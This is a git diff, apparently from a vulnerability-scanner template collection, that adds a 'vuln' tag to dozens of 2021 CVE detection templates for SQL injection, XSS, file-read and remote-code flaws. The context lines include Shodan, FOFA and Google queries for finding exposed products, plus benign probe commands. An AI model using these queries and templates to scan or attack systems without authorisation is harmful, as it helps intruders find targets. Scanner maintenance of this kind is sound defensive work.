cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex,vuln variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index c009e7f800b..3847d7bed2d 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: justwriting_project product: justwriting - tags: cve2021,cve,justwriting,xss,justwriting_project + tags: cve2021,cve,justwriting,xss,justwriting_project,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml index ffebca4d230..de3ea82beac 100644 --- a/http/cves/2021/CVE-2021-41569.yaml +++ b/http/cves/2021/CVE-2021-41569.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: sas product: sas\/intrnet - tags: cve2021,cve,sas,lfi,vkev + tags: cve2021,cve,sas,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml index 4f08f7ddf7c..ce980ecee01 100644 --- a/http/cves/2021/CVE-2021-41648.yaml +++ b/http/cves/2021/CVE-2021-41648.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online-shopping-system-advanced_project product: online-shopping-system-advanced - tags: cve2021,cve,sqli,packetstorm,online-shopping-system-advanced_project + tags: cve2021,cve,sqli,packetstorm,online-shopping-system-advanced_project,vuln http: - method: POST diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index 2d8f1ae2ef9..ecfa9c8180c 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online-shopping-system-advanced_project product: online-shopping-system-advanced - tags: cve2021,cve,sqli,injection,online-shopping-system-advanced_project,vkev + tags: cve2021,cve,sqli,injection,online-shopping-system-advanced_project,vkev,vuln http: - method: POST diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml index a064325695f..d6737df1ba8 100644 --- a/http/cves/2021/CVE-2021-41653.yaml +++ b/http/cves/2021/CVE-2021-41653.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: tp-link product: tl-wr840n_firmware - tags: cve2021,cve,tplink,rce,router,tp-link,vkev + tags: cve2021,cve,tplink,rce,router,tp-link,vkev,vuln variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2021/CVE-2021-41691.yaml b/http/cves/2021/CVE-2021-41691.yaml index c51402e3bb7..482117c6810 100644 --- a/http/cves/2021/CVE-2021-41691.yaml +++ b/http/cves/2021/CVE-2021-41691.yaml @@ -19,7 +19,7 @@ info: epss-percentile: 0.87304 metadata: max-request: 2 - tags: cve,cve2021,sqli,auth,edb,opensis,vkev + tags: cve,cve2021,sqli,auth,edb,opensis,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml index d418ac43c74..689aaf81ea1 100644 --- a/http/cves/2021/CVE-2021-41749.yaml +++ b/http/cves/2021/CVE-2021-41749.yaml @@ -28,7 +28,7 @@ info: - 'X-Powered-By: Craft CMS html:"SEOmatic"' - "x-powered-by: craft cms" - 'x-powered-by: craft cms html:"seomatic"' - tags: cve2021,cve,craftcms,cms,ssti,nystudio107,craft_cms + tags: cve2021,cve,craftcms,cms,ssti,nystudio107,craft_cms,vuln variables: num1: "{{rand_int(40000, 44800)}}" num2: "{{rand_int(40000, 44800)}}" diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index ee67ab35dc8..f359e36cadb 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -34,7 +34,7 @@ info: - Apache 2.4.49 - cpe:"cpe:2.3:a:apache:http_server" - apache 2.4.49 - tags: cve2021,cve,lfi,rce,apache,misconfig,traversal,kev,vkev + tags: cve2021,cve,lfi,rce,apache,misconfig,traversal,kev,vkev,vuln variables: cmd: "echo COP-37714-1202-EVC | rev" diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml index db04cc88f7a..2424dc080a0 100644 --- a/http/cves/2021/CVE-2021-41826.yaml +++ b/http/cves/2021/CVE-2021-41826.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: place product: placeos_authentication - tags: cve2021,cve,redirect,edb,packetstorm,placeos,place + tags: cve2021,cve,redirect,edb,packetstorm,placeos,place,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml index 84b60cf8f08..b7c2959e6d0 100644 --- a/http/cves/2021/CVE-2021-41878.yaml +++ b/http/cves/2021/CVE-2021-41878.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: hkurl product: i-panel_administration_system - tags: cve2021,cve,ipanel,xss,packetstorm,hkurl + tags: cve2021,cve,ipanel,xss,packetstorm,hkurl,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 792048a2a74..da778f29336 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -32,7 +32,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: cve2021,cve,gitlab,api,graphql,enum,unauth,vkev + tags: cve2021,cve,gitlab,api,graphql,enum,unauth,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index 375c1ed3292..51403c43d95 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: montala product: resourcespace - tags: cve2021,cve,xss,resourcespace,montala,vkev + tags: cve2021,cve,xss,resourcespace,montala,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index 36444636e54..55ab699ce4f 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -31,7 +31,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:http_server" - apache 2.4.49 - tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev,vkev + tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev,vkev,vuln variables: cmd: "echo 31024-1202-EVC | rev" diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index bcb62dd6056..639bacf4309 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.favicon.hash:-266008933 fofa-query: icon_hash=-266008933 zoomeye-query: app="SAP NetWeaver Application Server httpd - tags: cve2021,cve,sap,xss,seclists,packetstorm,vkev + tags: cve2021,cve,sap,xss,seclists,packetstorm,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-42071.yaml b/http/cves/2021/CVE-2021-42071.yaml index 8510f4aa229..0bef749456f 100644 --- a/http/cves/2021/CVE-2021-42071.yaml +++ b/http/cves/2021/CVE-2021-42071.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: visual-tools product: dvr_vx16_firmware - tags: cve2021,cve,edb,visualtools,rce,oast,injection,visual-tools,vkev + tags: cve2021,cve,edb,visualtools,rce,oast,injection,visual-tools,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index 2cdb63c0bb5..fa0b315fc89 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: konga_project product: konga - tags: cve2021,cve,authenticated,edb,konga,intrusive,konga_project + tags: cve2021,cve,authenticated,edb,konga,intrusive,konga_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index 0fb99823c1f..5cfc42eea90 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -31,7 +31,7 @@ info: - http.title:"sitecore" fofa-query: title="sitecore" google-query: intitle:"sitecore" - tags: cve2021,cve,packetstorm,rce,sitecore,deserialization,oast,kev,vkev + tags: cve2021,cve,packetstorm,rce,sitecore,deserialization,oast,kev,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-42258.yaml b/http/cves/2021/CVE-2021-42258.yaml index 66a30066553..d35fcb3dc33 100644 --- a/http/cves/2021/CVE-2021-42258.yaml +++ b/http/cves/2021/CVE-2021-42258.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: bqe product: billquick_web_suite - tags: cve2021,cve,sqli,billquick,kev,bqe,vkev + tags: cve2021,cve,sqli,billquick,kev,bqe,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-42359.yaml b/http/cves/2021/CVE-2021-42359.yaml index f84058cf0c2..c952d262d8d 100644 --- a/http/cves/2021/CVE-2021-42359.yaml +++ b/http/cves/2021/CVE-2021-42359.yaml @@ -25,7 +25,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/shapepress-dsgvo/" publicwww-query: "/wp-content/plugins/shapepress-dsgvo/" - tags: cve,cve2021,wp,wordpress,wp-plugin,dsgvo,intrusive,vkev + tags: cve,cve2021,wp,wordpress,wp-plugin,dsgvo,intrusive,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index b8f11a02e10..5c1351797cc 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: alcoda product: netbiblio - tags: cve2021,cve,xss,netbiblio,alcoda + tags: cve2021,cve,xss,netbiblio,alcoda,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index b1822a86281..756168efd65 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -28,7 +28,7 @@ info: vendor: myfactory product: fms google-query: inurl:ie50/system/ intitle:"myfactory" - tags: cve2021,cve,myfactory,xss + tags: cve2021,cve,myfactory,xss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index 606f2e91423..e0959e026ce 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -27,7 +27,7 @@ info: vendor: myfactory product: fms google-query: inurl:ie50/system/ intitle:"myfactory" - tags: cve,cve2021,myfactory,xss + tags: cve,cve2021,myfactory,xss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index d15c8cf7890..c1aaaadd404 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -32,7 +32,7 @@ info: - http.title:'cas - central authentication service' fofa-query: title='cas - central authentication service' google-query: intitle:'cas - central authentication service' - tags: cve2021,cve,apereo,xss,cas,vkev + tags: cve2021,cve,apereo,xss,cas,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index a7e34c786e1..52a43b80377 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.title:"Roteador Wireless" - cpe:"cpe:2.3:h:dlink:dir-615" - tags: cve2021,cve,d-link,router,unauth,dir-615,roteador,dlink + tags: cve2021,cve,d-link,router,unauth,dir-615,roteador,dlink,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index 9189b4bd6a0..96b0cb08495 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: online_event_booking_and_reservation_system_project product: online_event_booking_and_reservation_system - tags: cve2021,cve,xss,online_event_booking_and_reservation_system_project + tags: cve2021,cve,xss,online_event_booking_and_reservation_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-42667.yaml b/http/cves/2021/CVE-2021-42667.yaml index 40972f231cd..1b853ec0b13 100644 --- a/http/cves/2021/CVE-2021-42667.yaml +++ b/http/cves/2021/CVE-2021-42667.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: online_event_booking_and_reservation_system_project product: online_event_booking_and_reservation_system - tags: cve,cve2021,sqli,authenticated,online_event_booking_and_reservation_system_project + tags: cve,cve2021,sqli,authenticated,online_event_booking_and_reservation_system_project,vuln variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index c1d3833aa17..44f077fbb06 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -31,7 +31,7 @@ info: - http.title:"totolink" fofa-query: title="totolink" google-query: intitle:"totolink" - tags: cve2021,cve,totolink,auth-bypass,router + tags: cve2021,cve,totolink,auth-bypass,router,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 9587efaa1ea..cb88c4a5e4d 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -32,7 +32,7 @@ info: - title="fortimail" - fortimail && port=443 google-query: intitle:"fortimail" - tags: cve,cve2021,fortimail,xss,fortinet,edb + tags: cve,cve2021,fortimail,xss,fortinet,edb,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index 76ea8193223..d0d1952065c 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -34,7 +34,7 @@ info: - title="create a pipeline - go" html:"gocd version" - body="gocd version" google-query: intitle:"create a pipeline - go" html:"gocd version" - tags: cve2021,cve,go,lfi,gocd,thoughtworks,vkev + tags: cve2021,cve,go,lfi,gocd,thoughtworks,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index edd41a772b8..525078c05db 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: std42 product: elfinder - tags: cve,cve2021,elfinder,fileupload,rce,intrusive,std42 + tags: cve,cve2021,elfinder,fileupload,rce,intrusive,std42,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-43495.yaml b/http/cves/2021/CVE-2021-43495.yaml index a5ad4920c00..c8e88d755fc 100644 --- a/http/cves/2021/CVE-2021-43495.yaml +++ b/http/cves/2021/CVE-2021-43495.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: alquistai product: alquist - tags: cve2021,cve,lfi,alquist,alquistai + tags: cve2021,cve,lfi,alquist,alquistai,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index 210e4ec21a7..76e7674747d 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: clustering_project product: clustering - tags: cve2021,cve,lfi,clustering,clustering_project + tags: cve2021,cve,lfi,clustering,clustering_project,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index f08c3fd07d5..8fa82221bbe 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: simple_client_management_system_project product: simple_client_management_system - tags: cve2021,cve,simpleclientmanagement,sqli,auth-bypass,simple_client_management_system_project + tags: cve2021,cve,simpleclientmanagement,sqli,auth-bypass,simple_client_management_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index 8dd95f20890..b403b77b59a 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -36,7 +36,7 @@ info: fofa-query: - body="powered by atmail" - body="atmail" - tags: cve2021,cve,atmail,xss + tags: cve2021,cve,atmail,xss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index 51dd733fc8c..9304df957f4 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -32,7 +32,7 @@ info: - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" - tags: cve,cve2021,xss,spotweb,unauth,spotweb_project + tags: cve,cve2021,xss,spotweb,unauth,spotweb_project,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index 2aed2d6bd2e..2e1531bbc69 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="kkfileview" - app="kkfileview" - tags: cve2021,cve,kkfileview,traversal,lfi,keking + tags: cve2021,cve,kkfileview,traversal,lfi,keking,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index a8fa5728f08..e70e910887a 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: glpi-project product: barcode - tags: cve,cve2021,glpi,lfi,plugin,traversal,glpi-project,vkev + tags: cve,cve2021,glpi,lfi,plugin,traversal,glpi-project,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index 15ece21581d..c6fa0f7f88e 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -35,7 +35,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: cve2021,cve,packetstorm,grafana,lfi,vkev,kev + tags: cve2021,cve,packetstorm,grafana,lfi,vkev,kev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-4380.yaml b/http/cves/2021/CVE-2021-4380.yaml index 01297a06213..94dc184e158 100644 --- a/http/cves/2021/CVE-2021-4380.yaml +++ b/http/cves/2021/CVE-2021-4380.yaml @@ -26,7 +26,7 @@ info: vendor: valvepress product: pinterest_automatic_pin framework: wordpress - tags: cve,cve2021,wordpress,wp,wp-plugin,wp,vkev,intrusive,pinterest-automatic-pin + tags: cve,cve2021,wordpress,wp,wp-plugin,wp,vkev,intrusive,pinterest-automatic-pin,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index 8b5225b5a92..97dae4fbf64 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: admidio product: admidio - tags: cve2021,cve,admidio,xss + tags: cve2021,cve,admidio,xss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml index 05c5d4d6285..1aaf5fa8182 100644 --- a/http/cves/2021/CVE-2021-43831.yaml +++ b/http/cves/2021/CVE-2021-43831.yaml @@ -26,7 +26,7 @@ info: product: gradio framework: python shodan-query: title:"Gradio" - tags: cve,cve2021,lfi,gradio + tags: cve,cve2021,lfi,gradio,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml index 03b95bf74db..398eaa92790 100644 --- a/http/cves/2021/CVE-2021-44077.yaml +++ b/http/cves/2021/CVE-2021-44077.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"manageengine servicedesk plus" fofa-query: title="manageengine servicedesk plus" google-query: intitle:"manageengine servicedesk plus" - tags: cve2021,cve,rce,kev,msf,zoho,manageengine,zohocorp,vkev + tags: cve2021,cve,rce,kev,msf,zoho,manageengine,zohocorp,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 88d91c0a7b5..3b5555ce8a5 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -31,7 +31,7 @@ info: - http.html:"resin" - cpe:"cpe:2.3:a:caucho:resin" fofa-query: body="resin" - tags: cve2021,cve,resin,caucho,lfi + tags: cve2021,cve,resin,caucho,lfi,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 3f41409f5d5..78a81e23ae4 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -29,7 +29,7 @@ info: - http.title:"sentinel dashboard" fofa-query: title="sentinel dashboard" google-query: intitle:"sentinel dashboard" - tags: cve2021,cve,ssrf,alibaba,oast,misconfig,sentinel,hashicorp + tags: cve2021,cve,ssrf,alibaba,oast,misconfig,sentinel,hashicorp,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index 2e29fe6416e..e9a84e7839e 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -37,7 +37,7 @@ info: - body="reprise license manager" - body="reprise license" google-query: inurl:"/goforms/menu" - tags: cve,cve2021,packetstorm,rlm,auth-bypass,reprisesoftware + tags: cve,cve2021,packetstorm,rlm,auth-bypass,reprisesoftware,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index b1de7d0106e..4aad841db76 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: apache product: log4j - tags: cve2021,cve,rce,oast,log4j,injection,kev,apache,vkev + tags: cve2021,cve,rce,oast,log4j,injection,kev,apache,vkev,vuln variables: rand1: '{{rand_int(111, 999)}}' rand2: '{{rand_int(111, 999)}}' diff --git a/http/cves/2021/CVE-2021-44260.yaml b/http/cves/2021/CVE-2021-44260.yaml index 65e6812e369..4f70ca3c271 100644 --- a/http/cves/2021/CVE-2021-44260.yaml +++ b/http/cves/2021/CVE-2021-44260.yaml @@ -23,7 +23,7 @@ info: vendor: wavlink product: wl-wn531g3_firmware fofa-query: body="AC1200" && body="wavlink" - tags: cve,cve2022,wavlink,exposure,ac1200 + tags: cve,cve2022,wavlink,exposure,ac1200,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-4436.yaml b/http/cves/2021/CVE-2021-4436.yaml index 43643a98253..3f38f64545c 100644 --- a/http/cves/2021/CVE-2021-4436.yaml +++ b/http/cves/2021/CVE-2021-4436.yaml @@ -26,7 +26,7 @@ info: product: 3dprint_lite framework: wordpress publicwww-query: "/wp-content/plugins/3dprint-lite/" - tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive,vkev + tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive,vkev,vuln variables: string: "{{randstr}}" diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index 5eebf3a96f6..99e78132aee 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: rosariosis product: rosariosis - tags: cve,cve2021,sqli,rosariosis,vkev + tags: cve,cve2021,sqli,rosariosis,vkev,vuln http: - method: POST diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index 5c5fda0f0b1..65905999478 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -34,7 +34,7 @@ info: fofa-query: - body="apache superset" - icon_hash=1582430156 - tags: cve2021,cve,apache,superset,default-login + tags: cve2021,cve,apache,superset,default-login,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index a07b2c71259..47b442c7e67 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -31,7 +31,7 @@ info: - title="manageengine desktop central 10" - app="zoho-manageengine-desktop" google-query: intitle:"manageengine desktop central 10" - tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp,vkev + tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index aed2986a966..b6294ca80f7 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -28,7 +28,7 @@ info: vendor: rubyonrails product: rails shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails" - tags: cve2021,cve,seclists,redirect,rubyonrails + tags: cve2021,cve,seclists,redirect,rubyonrails,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index 820a4782bee..65d59563071 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -32,7 +32,7 @@ info: - http.title:"landesk(r) cloud services appliance" fofa-query: title="landesk(r) cloud services appliance" google-query: intitle:"landesk(r) cloud services appliance" - tags: cve2021,cve,ivanti,epm,csa,injection,packetstorm,kev,vkev + tags: cve2021,cve,ivanti,epm,csa,injection,packetstorm,kev,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index 06fddfc93ca..d44a15d9b87 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"thinfinity virtualui" fofa-query: title="thinfinity virtualui" google-query: intitle:"thinfinity virtualui" - tags: cve2021,cve,exposure,thinfinity,packetstorm,virtualui,tenable,cybelesoft + tags: cve2021,cve,exposure,thinfinity,packetstorm,virtualui,tenable,cybelesoft,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-44910.yaml b/http/cves/2021/CVE-2021-44910.yaml index b8857835b4d..168b919b694 100644 --- a/http/cves/2021/CVE-2021-44910.yaml +++ b/http/cves/2021/CVE-2021-44910.yaml @@ -10,7 +10,7 @@ info: - https://github.com/chillzhuang/blade-tool metadata: max-request: 3 - tags: cve,cve2021,springblade,blade,info-leak + tags: cve,cve2021,springblade,blade,info-leak,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-45027.yaml b/http/cves/2021/CVE-2021-45027.yaml index 8f731942117..45da0c61f97 100644 --- a/http/cves/2021/CVE-2021-45027.yaml +++ b/http/cves/2021/CVE-2021-45027.yaml @@ -19,7 +19,7 @@ info: metadata: max-request: 1 verified: true - tags: cve,cve2021,lfi,oliver,edb,windows + tags: cve,cve2021,lfi,oliver,edb,windows,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index b0a59d12944..d50a2575b02 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -32,7 +32,7 @@ info: google-query: - intitle:"HD-Network Real-time Monitoring System V2.0" - intitle:"hd-network real-time monitoring system v2.0" - tags: cve2021,cve,camera,edb,hdnetwork,lfi,iot,hd-network_real-time_monitoring_system_project + tags: cve2021,cve,camera,edb,hdnetwork,lfi,iot,hd-network_real-time_monitoring_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 7cb62a84221..7c32205a05f 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: apache product: log4j - tags: cve2021,cve,rce,oast,log4j,injection,kev,apache,vkev + tags: cve2021,cve,rce,oast,log4j,injection,kev,apache,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index 94d7f4c9cf9..6d16ffed4b4 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"thinfinity virtualui" fofa-query: title="thinfinity virtualui" google-query: intitle:"thinfinity virtualui" - tags: cve2021,cve,packetstorm,iframe,thinfinity,tenable,injection,cybelesoft,vkev + tags: cve2021,cve,packetstorm,iframe,thinfinity,tenable,injection,cybelesoft,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml index 